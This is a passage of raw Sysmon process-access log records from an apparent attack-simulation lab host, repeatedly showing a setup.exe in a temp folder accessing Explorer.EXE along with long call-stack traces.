ll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
